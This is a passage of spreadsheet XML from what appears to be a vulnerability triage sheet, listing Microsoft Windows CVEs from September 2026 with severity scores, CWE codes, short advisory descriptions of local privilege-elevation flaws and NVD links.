        <v>0.002</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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91" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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98" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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99" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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1" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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2" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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3" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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6" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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7" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
